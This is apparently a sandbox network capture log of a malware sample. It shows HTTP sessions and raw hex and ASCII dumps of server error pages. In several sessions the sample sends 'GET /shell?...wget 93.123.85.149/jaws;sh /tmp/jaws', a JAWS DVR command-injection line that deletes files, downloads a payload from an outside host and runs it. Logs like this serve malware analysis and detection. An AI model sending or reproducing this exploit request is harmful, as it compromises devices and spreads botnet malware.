20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a
                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%;
                                                            Jan 26, 2024 15:31:49.786705971 CET1286INData Raw: 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61
                                                            Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat:
                                                            Jan 26, 2024 15:31:49.786716938 CET1286INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20
                                                            Data Ascii: } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer
                                                            Jan 26, 2024 15:31:49.786729097 CET1286INData Raw: 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b
                                                            Data Ascii: ; } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0;
                                                            Jan 26, 2024 15:31:49.786741972 CET1286INData Raw: 6f 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38
                                                            Data Ascii: obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQG
                                                            Jan 26, 2024 15:31:49.786752939 CET1286INData Raw: 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37 50 41 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 74 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36 6d 2f 70 43 78 45 69 33 59 37 70 34 38 35 45 53 41 56 6d
                                                            Data Ascii: Rm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGECjUABhPLMdT
                                                            Jan 26, 2024 15:31:49.786765099 CET529INData Raw: 70 32 42 44 34 66 47 64 73 66 71 68 78 47 51 54 51 5a 6c 75 48 55 4c 58 72 52 73 55 46 66 42 45 30 4f 67 7a 49 6c 72 61 52 38 76 6b 77 36 71 6e 58 6d 75 44 53 46 38 52 67 53 38 74 68 2b 64 2b 70 68 63 69 38 46 4a 66 31 66 77 61 70 69 34 34 72 46
                                                            Data Ascii: p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hXRDDRzdwHZ/5D2hjjght3Mb5
                                                            Jan 26, 2024 15:31:49.786777973 CET1286INData Raw: 42 4e 42 37 57 6b 41 62 38 31 6b 7a 38 66 45 6f 35 4e 61 30 72 41 51 59 55 38 4b 51 45 57 45 50 53 6b 41 61 61 66 6e 52 50 69 58 45 47 48 50 43 43 62 63 6e 78 70 68 49 45 50 50 6e 68 58 63 39 58 6b 52 4e 75 48 68 33 43 77 38 4a 58 74 65 65 43 56
                                                            Data Ascii: BNB7WkAb81kz8fEo5Na0rAQYU8KQEWEPSkAaafnRPiXEGHPCCbcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAAABJRU5ErkJggg==); } .container { width: 70%; } .status-code
                                                            Jan 26, 2024 15:31:49.786789894 CET926INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2d 73 79 73 2f 73 65 72 76 65 72 5f 6d 69 73 63 6f 6e 66 69 67 75 72
                                                            Data Ascii: <li> <img src="/img-sys/server_misconfigured.png" class="info-image" /> <div class="info-heading"> (none)/shell?cd+/tmp;rm+-rf+*;wget+ (port 80


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            228192.168.2.234690665.110.67.480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:49.655534983 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:49.811685085 CET1286INHTTP/1.1 200 OK
                                                            Content-Length: 4417
                                                            Connection: Close
                                                            Cache-Control: no-cache
                                                            Content-Type: text/html; charset=utf-8
                                                            X-Frame-Options: SAMEORIGIN
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 38 3b 20 49 45 3d 45 44 47 45 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 61 36 61 36 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 64 61 74 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 70 61 73 73 77 6f 72 64 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 78 74 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 69 6d 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 75 72 6c 5d 2c 20 73 65 6c 65 63 74 2c 20 74 65 78 74 61 72 65 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 36 32 36 32 36 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 2e 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 70 78 20 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 70 70 65 61 72 61 6e 63 65 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                            Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=8; IE=EDGE"> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { height: 100%; font-family: Helvetica, Arial, sans-serif; color: #6a6a6a; margin: 0; display: flex; align-items: center; justify-content: center; } input[type=date], input[type=email], input[type=number], input[type=password], input[type=search], input[type=tel], input[type=text], input[type=time], input[type=url], select, textarea { color: #262626; vertical-align: baseline; margin: .2em; border-style: solid; border-width: 1px; border-color: #a9a9a9; background-color: #fff; box-sizing: border-box; padding: 2px .5em; appearance: none;
                                                            Jan 26, 2024 15:31:49.812105894 CET1286INData Raw: 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72
                                                            Data Ascii: border-radius: 0; } input:focus { border-color: #646464; box-shadow: 0 0 1px 0 #a2a2a2; outline: 0; } button { padding: .5em 1em;
                                                            Jan 26, 2024 15:31:49.812165976 CET1286INData Raw: 72 67 62 61 28 30 2c 30 2c 30 2c 2e 35 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 61 62 6c 65 20 3e 20 74 62 6f 64 79 20 3e 20 74 72 20 3e 20 74 64 3a 66 69 72 73 74 2d 6f 66 2d 74 79 70 65 20 7b 0a
                                                            Data Ascii: rgba(0,0,0,.5); } table > tbody > tr > td:first-of-type { vertical-align: top; } table > tbody > tr > td { padding: .3em .3em; } .field {
                                                            Jan 26, 2024 15:31:49.812179089 CET761INData Raw: 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 74 65 78 74 2d 63 65 6e 74 65 72 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                            Data Ascii: font-size: 1em; } .text-centered { text-align: center; } .text-container { margin: 1em 1.5em; } .flex-container {


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            229192.168.2.2337518162.14.120.4580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:49.711222887 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:50.079263926 CET253INHTTP/1.1 200 OK
                                                            Server: nginx/1.20.2
                                                            Date: Fri, 26 Jan 2024 14:31:49 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 16489
                                                            Last-Modified: Thu, 07 Jul 2022 14:18:28 GMT
                                                            Connection: keep-alive
                                                            ETag: "62c6eb34-4069"
                                                            Accept-Ranges: bytes
                                                            Jan 26, 2024 15:31:50.079278946 CET1286INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 20 63 6f
                                                            Data Ascii: <!DOCTYPE html><html><head><meta charset=utf-8><meta http-equiv=X-UA-Compatible content="IE=edge,chrome=1"><meta name=renderer content=webkit><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"><li
                                                            Jan 26, 2024 15:31:50.079324961 CET1286INData Raw: 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 0d 0a 20 20 20 20 20 20 2d 6d 73 2d 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 0d 0a 20 20 20 20 20 20 2d 6d 6f
                                                            Data Ascii: spin 2s linear infinite; -ms-animation: spin 2s linear infinite; -moz-animation: spin 2s linear infinite; -o-animation: spin 2s linear infinite; animation: spin 2s linear infinite; z-index: 1001; }
                                                            Jan 26, 2024 15:31:50.079339981 CET1286INData Raw: 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 0d 0a 20 20 20 20 20 20 20 20 74 72 61
                                                            Data Ascii: webkit-transform: rotate(0deg); -ms-transform: rotate(0deg); transform: rotate(0deg); } 100% { -webkit-transform: rotate(360deg); -ms-transform: rotate(360deg); transform: rotate(360de
                                                            Jan 26, 2024 15:31:50.079471111 CET1286INData Raw: 30 2e 33 35 35 2c 20 31 2e 30 30 30 29 3b 0d 0a 20 20 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 30 2e 37 73 20 30 2e 33 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 36 34 35 2c 20 30 2e 30 34 35 2c 20 30 2e 33 35 35 2c 20
                                                            Data Ascii: 0.355, 1.000); transition: all 0.7s 0.3s cubic-bezier(0.645, 0.045, 0.355, 1.000); } .loaded #loader-wrapper .loader-section.section-right { -webkit-transform: translateX(100%); -ms-transform: translateX(100%);
                                                            Jan 26, 2024 15:31:50.079488993 CET1286INData Raw: 72 61 70 70 65 72 20 2e 6c 6f 61 64 5f 74 69 74 6c 65 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0d 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 0d 0a
                                                            Data Ascii: rapper .load_title span { font-weight: normal; font-style: italic; font-size: 13px; color: #FFF; opacity: 0.5; }</style><link href=/static/css/chunk-libs.10fa90a7.css rel=stylesheet><link href=/static/cs
                                                            Jan 26, 2024 15:31:50.079500914 CET1286INData Raw: 2c 22 63 68 75 6e 6b 2d 32 31 30 63 61 33 65 39 22 3a 22 64 64 61 30 36 62 30 33 22 2c 22 63 68 75 6e 6b 2d 32 31 30 63 65 33 32 34 22 3a 22 36 38 39 62 30 65 37 31 22 2c 22 63 68 75 6e 6b 2d 32 31 31 62 30 30 61 34 22 3a 22 39 63 31 66 33 62 62
                                                            Data Ascii: ,"chunk-210ca3e9":"dda06b03","chunk-210ce324":"689b0e71","chunk-211b00a4":"9c1f3bbd","chunk-2727631f":"a4d3a58f","chunk-2d0b1626":"03b39dfc","chunk-2d0bce05":"495d0508","chunk-2d0c8e18":"7528ef76","chunk-2d0da2ea":"eb79c21d","chunk-2d0e2366":"
                                                            Jan 26, 2024 15:31:50.079513073 CET1286INData Raw: 39 62 22 3a 22 32 39 62 30 61 32 33 65 22 2c 22 63 68 75 6e 6b 2d 37 34 61 64 30 62 33 61 22 3a 22 32 34 31 32 30 32 64 39 22 2c 22 63 68 75 6e 6b 2d 35 61 65 35 36 34 61 31 22 3a 22 31 64 37 62 39 38 34 62 22 2c 22 63 68 75 6e 6b 2d 30 64 39 39
                                                            Data Ascii: 9b":"29b0a23e","chunk-74ad0b3a":"241202d9","chunk-5ae564a1":"1d7b984b","chunk-0d998bce":"8f770729","chunk-388d29fa":"c50c8da4","chunk-594bce0e":"60d27e47","chunk-5b54baa1":"bf71842f","chunk-339ce299":"80dea23c","chunk-1280be54":"7a896d58","chu
                                                            Jan 26, 2024 15:31:50.079524994 CET1286INData Raw: 2c 22 63 68 75 6e 6b 2d 34 62 31 65 34 64 63 61 22 3a 22 31 61 35 36 63 33 66 63 22 2c 22 63 68 75 6e 6b 2d 35 30 65 33 31 32 64 38 22 3a 22 61 36 62 32 65 31 35 62 22 2c 22 63 68 75 6e 6b 2d 37 35 65 31 39 36 65 38 22 3a 22 34 33 33 39 38 34 34
                                                            Data Ascii: ,"chunk-4b1e4dca":"1a56c3fc","chunk-50e312d8":"a6b2e15b","chunk-75e196e8":"43398446","chunk-9a88297e":"8e738f22","chunk-a662c34e":"a1328321","chunk-a6f3fa30":"3de57f36","chunk-b7481a02":"14ea32c7","chunk-c4b1fb12":"34e1018a","chunk-d19c1a98":"
                                                            Jan 26, 2024 15:31:50.079538107 CET1286INData Raw: 3a 31 2c 22 63 68 75 6e 6b 2d 36 66 61 34 62 62 31 39 22 3a 31 2c 22 63 68 75 6e 6b 2d 39 31 36 34 64 66 35 32 22 3a 31 2c 22 63 68 75 6e 6b 2d 34 32 38 65 63 34 65 34 22 3a 31 2c 22 63 68 75 6e 6b 2d 35 62 35 32 63 36 37 63 22 3a 31 2c 22 63 68
                                                            Data Ascii: :1,"chunk-6fa4bb19":1,"chunk-9164df52":1,"chunk-428ec4e4":1,"chunk-5b52c67c":1,"chunk-5b83c289":1,"chunk-5f98409e":1,"chunk-68193ef0":1,"chunk-70921fa8":1,"chunk-745c7890":1,"chunk-74680cd7":1,"chunk-74a09ff2":1,"chunk-7b5d0a49":1,"chunk-7c5e7


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            230192.168.2.235985843.248.169.5080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:50.006489038 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:50.301491022 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:50 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            231192.168.2.235491081.60.196.10680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:50.047489882 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:50.418519020 CET62INHTTP/1.0 400 Bad Request
                                                            Connection: Keep-Alive
                                                            Jan 26, 2024 15:31:50.418533087 CET885INData Raw: 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 30 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 36 33 30 37 32 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61
                                                            Data Ascii: Keep-Alive: timeout=0Strict-Transport-Security: max-age=63072000; includeSubDomains; preloadX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Security-Policy: default-src 'self'; frame-src * 'self'; img-src * 's


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            232192.168.2.233432434.49.218.22780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:51.202892065 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            233192.168.2.234732838.173.86.11980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:51.388493061 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:51.677519083 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:38:24 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            234192.168.2.233783260.43.214.23180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:51.435831070 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:51.771858931 CET404INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:51 GMT
                                                            Server: Apache
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
